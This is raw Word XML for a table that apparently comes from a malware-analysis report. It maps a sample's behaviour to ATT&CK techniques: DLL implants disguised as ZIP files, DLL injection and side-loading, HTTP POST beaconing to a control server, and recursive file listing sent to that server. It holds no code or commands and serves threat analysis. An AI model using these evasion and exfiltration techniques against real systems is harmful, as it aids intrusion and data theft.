          <w:p w14:paraId="42BD06CA" w14:textId="6D67FC42" w:rsidR="006115B2" w:rsidRPr="00E21A04" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21A04">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036 Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68BA5D1B" w14:textId="525EF164" w:rsidR="006115B2" w:rsidRPr="00E21A04" w:rsidRDefault="005E7360" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009C146D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="273D5CD5" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA4FB05" w14:textId="1F5F6977" w:rsidR="006115B2" w:rsidRPr="006115B2" w:rsidRDefault="009C146D" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5092B9F6" w14:textId="3565B7F5" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="00C40195" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C40195">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F4F473" w14:textId="7F7877A3" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
              <w:t>The implants (DLLs) are disguised as ZIP files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="002D1D50" w14:paraId="1EB05B23" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A2D018D" w14:textId="5B70F1A4" w:rsidR="006115B2" w:rsidRPr="00083830" w:rsidRDefault="00083830" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA147F3" w14:textId="3A187864" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E39">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">5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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25522B4B" w14:textId="0162F27A" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F632A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1055.001 Process Injection: Dynamic-link Library Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C539304" w14:textId="1022E248" w:rsidR="006115B2" w:rsidRPr="00597A2E" w:rsidRDefault="005E7360" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D12AB58" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E85983B" w14:textId="09614418" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D3BF831" w14:textId="51595206" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1227D8B1" w14:textId="77777777" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
              <w:t>To mask itself, it can run as a regular library loaded into a legitimate process</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214D1230" w14:textId="77777777" w:rsidR="003E6738" w:rsidRDefault="003E6738" w:rsidP="006115B2"/>
          <w:p w14:paraId="50AD2D51" w14:textId="740A8B60" w:rsidR="003E6738" w:rsidRPr="002D1D50" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Pivot happens here</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="0266B33E" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4C2155" w14:textId="2ED7D097" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="00083830" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="006115B2" w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CA79969" w14:textId="73367B16" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54B541B0" w14:textId="38F700F4" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>T1574.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A5D008" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D312805" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7287BE61" w14:textId="445DF557" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C2AAD9B" w14:textId="36ABA939" w:rsidR="006115B2" w:rsidRPr="00B94ADB" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C52DFF6" w14:textId="5A9859E2" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Replaced by 6 above after further investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="56EF4D47" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3931276B" w14:textId="60004538" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00083830" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC2086E" w14:textId="0CEC69A8" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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07CA29F3" w14:textId="1BF2ED29" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">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71B7F56A" w14:textId="783B27E0" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00597A2E" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C9C17E" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D703DE7" w14:textId="46C88E15" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="394ECECE" w14:textId="2136BFD3" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F6092E0" w14:textId="043B55FA" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:r>
              <w:t>[1] The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00590415" w:rsidRPr="00B857D7" w14:paraId="5484BCBE" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02E38FED" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F153164" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B14AF4F" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03963C59" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3595E339" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523AC0B9" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="330049D5" w14:textId="5A5130AC" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00537EED" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1D34F1" w14:textId="77777777" w:rsidR="00590415" w:rsidRPr="00B857D7" w:rsidRDefault="00590415" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA46D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Recursively generate a list of files in a directory and send to the control server  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="241D530E" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B517AD" w14:textId="53B94FB9" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00083830" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="635A2A4D" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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1515BFBD" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">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7E69817C" w14:textId="1B87AE53" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00597A2E" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D00CEE1" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
